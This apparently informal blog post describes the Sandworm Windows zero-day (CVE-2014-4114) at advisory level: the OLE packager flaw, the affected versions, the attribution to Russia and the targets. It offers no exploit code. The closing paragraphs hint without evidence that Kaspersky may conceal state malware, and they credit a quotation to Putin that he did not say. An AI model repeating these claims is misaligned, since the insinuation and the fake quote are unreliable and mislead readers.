All Windows versions - except XP - have a zero day vulnerability that enables the perpetrator to fish all vital information from your Windows computer. This includes Credit Card numbers Passwords and System information.
Once you click a link your system can be completely taken over (You have to click that link).
The group iSIGHT has identified the vulnerability they call Sandworm - this is their name of it. F-Secure discovered parts of it and called it Quedach.
F-Secure did not identify this as a WIndows zero day exploit. The boring name for the vulnerability is CVE-2014-4114.
We know that these hackers use proxy servers to reroute internet traffic.
The emphasis is on who is using it to hack systems . So far we know this about the vulnerability:
- An exposed dangerous method vulnerability exists in the OLE package manager in Microsoft Windows and Server
Impacting all versions of the Windows operating system from Vista SP2 to Windows 8.1
Impacting Windows Server versions 2008 and 2012
When exploited, the vulnerability allows an attacker to remotely execute arbitrary code
The vulnerability exists because Windows allows the OLE packager (packager .dll) to download and execute INF files. In the case of the observed exploit, specifically when handling Microsoft PowerPoint files, the packagers allows a Package OLE object to reference arbitrary external files, such as INF files, from untrusted sources.
This will cause the referenced files to be downloaded in the case of INF files, to be executed with specific commands
An attacker can exploit this vulnerability to execute arbitrary code but will need a specifically crafted file and use social engineering methods (observed in this campaign) to convince a user to open it
iSIGHT points out the Russian government as the hacker and the targets are:
Ukrainian government organizations
Western European government organization Energy Sector firms (specifically in Poland)
European telecommunications firms
United States academic organization
The vulnerability is called Sandworm due to the many references to the movie Dune where Sandworms play a vital role, it is not a classical worm in terms of computer worms.
If you want the deatailed report you can request it here
Microsoft is working to patch this vulnerability and to offer workarounds. Until that has happened further details will not be given - in the name of security.
What you can do about it, is not to open e-mail attachment's from untrusted sources and apply Microsoft patches.
Symantec (Norton AV) informs about this and interestingly the well renomated Russian Kaspersky lab does not.
Where your AV provider comes from does matter. Symantec is a US company Kaspersky is a Russian company - and both are banned in China
Instructions - with gag orders - to not discover "patriotic" viruses - can simply not be ruled out. In the name of national security - anything goes.
Running both of them should be an option though if one of the scans is ran offline from a DVD (not tested). Both Symantec and Kaspersky require for the other to be removed before install.Avira would be a good alternative being German or the Czech Avast.
Romanian Bitdefender seems to be winning all the tests these days.
Rumor has it that the Russians will not confirm their part in this cyber activity.... but someone claims to have heard Putin say :
Our intelligence agencies will continue to gather information about the intentions of governments -- as opposed to ordinary citizens -- around the world, in the same way that the intelligence services of every other nation does. We will not apologize simply because our services may be more effective